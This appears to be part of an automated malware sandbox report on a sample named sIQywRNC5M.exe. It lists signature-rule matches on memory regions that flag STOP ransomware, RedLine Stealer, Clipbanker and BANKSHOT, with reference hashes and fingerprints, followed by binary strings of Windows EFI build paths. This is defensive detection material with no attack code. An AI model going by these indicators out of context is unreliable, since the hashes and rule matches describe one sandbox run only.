Source: 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001B.00000002.3341836401.0000000000A60000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2729646058.0000000000910000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.2309561006.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000010.00000002.2309561006.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.3965896478.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.3965896478.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.2029947152.0000000004449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2111904920.0000000001AFE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.2229691147.00000000009AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000018.00000002.2700850875.0000000004474000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001D.00000002.3966079968.0000000000AB0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.2231956376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000D.00000002.2231956376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001E.00000002.3965041691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.3965041691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.2229449247.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.2229449247.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000004.00000002.2052258442.0000000004449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: sIQywRNC5M.exe PID: 5896, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 3624, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 4712, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 4220, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 4160, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 1476, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 2928, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 3580, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 2624, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: sIQywRNC5M.exe PID: 3808, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
